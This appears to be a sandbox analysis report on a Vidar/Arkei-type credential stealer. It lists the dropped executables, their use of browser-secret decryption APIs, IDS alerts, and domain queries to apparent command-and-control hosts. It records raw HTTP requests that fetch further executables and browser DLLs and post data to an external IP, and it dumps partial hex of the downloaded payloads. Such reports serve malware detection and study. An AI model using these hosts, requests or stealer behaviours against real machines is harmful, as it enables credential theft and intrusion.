Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00404830 memset,CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00407510 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00407190 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_004077A0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D4A80 CryptStringToBinaryA,CryptStringToBinaryA,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D76C0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D7760 CryptUnprotectData,LocalAlloc,LocalFree,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D73E0 CryptUnprotectData,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D79F0 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Unpacked PE file: 8.2.76E7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\6902.exe; Unpacked PE file: 11.2.6902.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe; Unpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack
Source: C:\Windows\SysWOW64\ejdjvovs\qxoxlxqh.exe; Unpacked PE file: 26.2.qxoxlxqh.exe.400000.0.unpack
Source: V91yW08J6p.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\AppData\Local\Temp\7CCD.exe; File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown; HTTPS traffic detected: 185.233.81.115:443 -> 192.168.2.4:49800 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 172.67.139.105:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 104.21.38.221:443 -> 192.168.2.4:49857 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 94.102.49.170:443 -> 192.168.2.4:49861 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49870 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49875 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.28.78.238:443 -> 192.168.2.4:49883 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 67.199.248.11:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.4:49890 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49894 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.4:49900 version: TLS 1.2
Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
Source: Binary string: C:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp
Source: Binary string: Vt]C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
Source: Binary string: C:\rero24 besar69\gomelafulogu m.pdb source: V91yW08J6p.exe, 00000000.00000002.674693489.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000000.00000000.666789569.0000000000413000.00000002.00020000.sdmp, V91yW08J6p.exe, 00000002.00000000.672658801.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000000.766653368.0000000000413000.00000002.00020000.sdmp, adiicvb, 00000005.00000002.776111156.0000000000413000.00000002.00020000.sdmp
Source: Binary string: C:\cedelecesi-roputewelu21\ropofarax15\ca.pdb source: 6902.exe, 0000000B.00000002.841823438.0000000000675000.00000004.00000020.sdmp, 6902.exe, 0000000B.00000000.808532336.0000000000413000.00000002.00020000.sdmp, 6902.exe, 0000000B.00000002.840524705.0000000000415000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000000.840734241.0000000000413000.00000002.00020000.sdmp, qxoxlxqh.exe, 0000001A.00000002.850054459.0000000000415000.00000002.00020000.sdmp
Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 7CCD.exe, 00000007.00000000.788685513.0000000000413000.00000002.00020000.sdmp, 7CCD.exe, 00000007.00000002.807583857.0000000000413000.00000002.00020000.sdmp
Source: Binary string: dC:\rativilo_s.pdb source: 76E7.exe, 00000008.00000000.801375549.0000000000413000.00000002.00020000.sdmp
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D8A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D6090 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D14D0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D12E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D9930 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D9D90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
Source: C:\Users\user\AppData\Local\Temp\76E7.exe; Code function: 8_2_020D9BC0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: Traffic | Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.4:49886 -> 78.46.160.87:80
Source: Traffic | Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.4:49893 -> 141.8.192.58:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: github.com
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: patmushta.info
Source: C:\Windows\explorer.exe | Domain query: raw.githubusercontent.com
Source: C:\Windows\explorer.exe | Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe | Network Connect: 188.166.28.199 80
Source: C:\Windows\explorer.exe | Domain query: unicupload.top
Source: C:\Windows\explorer.exe | Domain query: srtuiyhuali.at
Source: C:\Windows\explorer.exe | Network Connect: 185.233.81.115 187
Source: C:\Windows\explorer.exe | Domain query: fufuiloirtu.com
Source: C:\Windows\explorer.exe | Domain query: amogohuigotuli.at
Source: C:\Windows\explorer.exe | Network Connect: 185.7.214.171 144
Source: C:\Windows\explorer.exe | Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe | Domain query: bit.ly
Source: C:\Windows\SysWOW64\svchost.exe | Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\explorer.exe | Domain query: goo.su
Source: C:\Windows\explorer.exe | Domain query: transfer.sh
Source: C:\Windows\explorer.exe | Domain query: a0620531.xsph.ru
Source: C:\Windows\explorer.exe | Network Connect: 185.186.142.166 80
Source: C:\Windows\explorer.exe | Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe | Domain query: softwaresworld.net
Source: C:\Windows\explorer.exe | Domain query: data-host-coin-8.com
Source: C:\Windows\explorer.exe | Domain query: unic11m.top
May check the online IP address of the machine
Source: unknown | DNS query: name: iplogger.org
Source: global traffic | HTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
Source: global traffic | HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Content-Length: 128Host: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/f1f6008861078c1253fd20374ac2ce7ed5f44d80 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
Source: global traffic | HTTP traffic detected: POST /565 HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467AContent-Length: 25Host: 78.46.160.87Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Source: global traffic | HTTP traffic detected: GET /freebl3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /mozglue.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET //l/f/YmurSn4BZ2GIX1a3-bIa/46e4c7a557d7fa442d5850cc1378fc753993ad31 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
Source: global traffic | HTTP traffic detected: GET /msvcp140.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /nss3.dll HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0Host: 78.46.160.87Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /htrrfwedsqw.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
Source: global traffic | HTTP traffic detected: GET /c_setup.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
Source: global traffic | HTTP traffic detected: GET /RMR.exe HTTP/1.1Host: a0620531.xsph.ruAccept: */*
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:43:56 GMTContent-Type: application/x-msdos-programContent-Length: 301056Connection: closeLast-Modified: Mon, 10 Jan 2022 12:06:49 GMTETag: "49800-5d5392be00934"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 32 74 07 b2 76 15 69 e1 76 15 69 e1 76 15 69 e1 68 47 fc e1 69 15 69 e1 68 47 ea e1 fc 15 69 e1 68 47 ed e1 5b 15 69 e1 51 d3 12 e1 71 15 69 e1 76 15 68 e1 f9 15 69 e1 68 47 e3 e1 77 15 69 e1 68 47 fd e1 77 15 69 e1 68 47 f8 e1 77 15 69 e1 52 69 63 68 76 15 69 e1 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d4 e8 62 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 1e 01 00 00 f6 03 00 00 00 00 00 9f 2d 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 a7 ea 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 65 01 00 50 00 00 00 00 00 04 00 b0 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 59 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c5 1d 01 00 00 10 00 00 00 1e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 3f 00 00 00 30 01 00 00 40 00 00 00 22 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 
58 84 02 00 00 70 01 00 00 24 02 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 10 01 00 00 00 04 00 00 12 01 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:02 GMTContent-Type: application/x-msdos-programContent-Length: 312320Connection: closeLast-Modified: Tue, 11 Jan 2022 19:44:01 GMTETag: W/"4c400-5d553accb2fe1"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 db e7 80 7e 9f 86 ee 2d 9f 86 ee 2d 9f 86 ee 2d 81 d4 7b 2d 88 86 ee 2d 81 d4 6d 2d 19 86 ee 2d 81 d4 6a 2d b1 86 ee 2d b8 40 95 2d 98 86 ee 2d 9f 86 ef 2d 12 86 ee 2d 81 d4 64 2d 9e 86 ee 2d 81 d4 7a 2d 9e 86 ee 2d 81 d4 7f 2d 9e 86 ee 2d 52 69 63 68 9f 86 ee 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 1e a9 b3 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 18 01 00 00 26 04 00 00 00 00 00 d7 2e 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 05 00 00 04 00 00 d7 52 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 5d 01 00 50 00 00 00 00 80 04 00 50 cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 31 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 50 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 a4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 23 16 01 00 00 10 00 00 00 18 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 37 00 00 00 30 01 00 00 38 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 
2e 64 61 74 61 00 00 00 78 01 03 00 00 70 01 00 00 a2 02 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 cd 00 00 00 80 04 00 00 ce 00 00 00 f6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Tue, 11 Jan 2022 19:44:37 GMTContent-Type: application/x-msdos-programContent-Length: 590848Connection: closeLast-Modified: Sun, 09 Jan 2022 14:15:02 GMTETag: "90400-5d526d88d6301"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e 60 89 17 1a 01 e7 44 1a 01 e7 44 1a 01 e7 44 04 53 63 44 33 01 e7 44 04 53 72 44 07 01 e7 44 04 53 64 44 66 01 e7 44 3d c7 9c 44 1f 01 e7 44 1a 01 e6 44 92 01 e7 44 04 53 6d 44 1b 01 e7 44 04 53 73 44 1b 01 e7 44 04 53 76 44 1b 01 e7 44 52 69 63 68 1a 01 e7 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c 5f 9e 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ec 00 00 00 d4 7b 02 00 00 00 00 9f 1c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 ab a3 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 84 07 00 3c 00 00 00 00 50 7b 02 f8 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7c 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 ea 00 00 00 10 00 00 00 ec 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 8d 06 00 00 00 01 00 00 8e 06 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 
b8 ba 73 02 00 90 07 00 00 86 00 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 fe 00 00 00 50 7b 02 00 00 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 11 Jan 2022 19:44:52 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 